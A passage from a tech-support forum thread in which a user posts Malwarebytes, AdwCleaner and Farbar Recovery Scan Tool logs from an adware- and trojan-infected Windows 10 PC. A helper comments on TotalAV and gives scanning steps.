Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS\CAST.CONFIG, Quarantined, [3707], [404709],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe.config, Quarantined, [3707], [404709],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\uninstaller.exe.config, Quarantined, [3707], [404709],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\NAMFRESH.BIN, Quarantined, [0], [392686],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I\CAST.CONFIG, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\config.conf, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe.config, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\GMJSB.exe.config, Quarantined, [3707], [404875],1.0.9182
Adware.Linkury.TskLnk, C:\USERS\THOMAZING!\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444923],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\CONFIG.XML, Quarantined, [3745], [404859],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\JOYBAM.EXE, Quarantined, [0], [392686],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q\CAST.CONFIG, Quarantined, [3707], [404610],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\uninstaller.exe.config, Quarantined, [3707], [404610],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\XUL9ZBX11.exe.config, Quarantined, [3707], [404610],1.0.9182
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444922],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\SILSONING.EXE, Quarantined, [0], [392686],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\hjuzju, Quarantined, [6000], [622124],1.0.9182
Adware.Linkury, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\46C812328954B3C2.VIR\SET.EXE, Quarantined, [1174], [504848],1.0.9182
Adware.ICLoader, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\423E52EEC1C7E6E2.VIR\LOCALNETSERVICE.EXE, Quarantined, [446], [629607],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6F63DA8166D7663.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\0B197384E1480C88.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\17B0D9AEADE97C1A.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\4D8D65C5DA32D3A5.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\5E15C71E020C778B.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\7349C58712B00B86.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\A7EC7F560E599347.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BC9E0698B166F917.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D41277DE13A9FABA.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\9869B8B38090EC66.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6D561D61D8312CF.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\002807D4DB6FEE2D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\2DCB9015FB18C84D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\638453067B9E1F8E.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\700D3EFE72E93B94.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\02FD59526C78F783.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\AEF671FBA34734D1.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\B3795D7D66BEAA7D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\27C38BCBF4B005D9.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BCF319F66631ED11.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\8334C130D38839A4.VIR, Quarantined, [2891], [625750],1.0.9182
Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\34A244487189F73A.VIR, Quarantined, [0], [392686],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BD9C0D84EEB01CAF.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\E89B8E7F8458E128.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Agent, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Quarantined, [99], [431629],1.0.9182
Adware.Linkury, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HBDZI2BL.PRE\APSF360DEV.EXE, Quarantined, [1174], [475745],1.0.9182
Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\IS-A6C3B.TMP\HOUSSEMID.EXE, Quarantined, [2891], [636075],1.0.9182
Backdoor.Andromeda, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\INSTALLER_MI.EXE, Quarantined, [837], [116111],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\NCYVGT4VXOC.EXE, Quarantined, [2805], [474076],1.0.9182
Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\XTEX.EXE, Quarantined, [528], [636874],1.0.9182
Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\PUVOQBDY.0AB\APP.EXE, Quarantined, [528], [636874],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [225], [550044],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
Adware.ICLoader, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\MCASIN.EXE, Quarantined, [446], [629607],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\KSKYZLLQ.5IO\SETUP.EXE, Quarantined, [0], [392686],1.0.9182
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
-
February 9th, 2019, 12:55 AM
#6
AdwCleaner[C00]
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-02-07.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-09-2019
# Duration: 00:00:01
# OS: Windows 10 Pro
# Cleaned: 17
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
Deleted C:\Users\Thomazing!\AppData\Roaming\TotalAV
Deleted C:\Users\Thomazing!\Documents\TotalAV
Deleted C:\Windows\Syswow64\SSL
Deleted C:\Users\Thomazing!\AppData\Local\WhiteClick
Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Windows\System32\drivers\WinmonFS.sys
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
AdwCleaner[S00]
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-02-07.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 02-09-2019
# Duration: 00:00:14
# OS: Windows 10 Pro
# Scanned: 31844
# Detected: 17
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
PUP.Optional.Legacy C:\Users\Thomazing!\AppData\Roaming\TotalAV
PUP.Optional.Legacy C:\Users\Thomazing!\Documents\TotalAV
PUP.Optional.Legacy C:\Windows\Syswow64\SSL
PUP.Optional.WhiteClick C:\Users\Thomazing!\AppData\Local\WhiteClick
Trojan.Agent C:\Windows\rss
***** [ Files ] *****
Trojan.Agent C:\Windows\System32\drivers\WinmonFS.sys
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
PUP.Optional.Glupteba HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
PUP.Optional.PCProtect HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
PUP.Optional.TotalAV HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
PUP.Optional.TotalAV HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
-
February 9th, 2019, 01:00 AM
#7
After doing AdwCleaner, this trojan was blocked by Malwarebytes. But it only pops up once in a while. Trojan after AdwCleaner.png
-
February 9th, 2019, 08:28 AM
#8
And why do the scanners treat Total AV as a PUP????
Is that normal???
I heard that Total AV is the top 1 free antivirus for 2019...
-
February 9th, 2019, 09:49 PM
#9
I'd avoid that program. Please read here: https://malwaretips.com/threads/tota...-a-scam.80362/
Re-run the Farbar Recovery Scan Tool (FRST/FRST64) that you ran at the very beginning of this topic.
- Double click to run it.
- Make sure you checkmark the Addition.txt box.
- Press the Scan button.
- The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them to your reply.
-
February 10th, 2019, 03:28 AM
#10
Oh I see. What do you recommend aside from Avast? Something that has a very fast, simple and friendly interface? Is Kaspersky good with those criteria?
Here:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 8.02.2019
Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (10-02-2019 15:24:18)
Running from C:\Users\Thomazing!\Downloads
Loaded Profiles: Thomazing! & (Available Profiles: Thomazing!)
Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95ee421a-76b4-4efd-b402-599e79537eca}: [DhcpNameServer] 10.22.96.55 10.1.96.55
Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
FireFox:
========
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
Chrome:
=======
CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-10]
CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
CHR Extension: (No Name) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
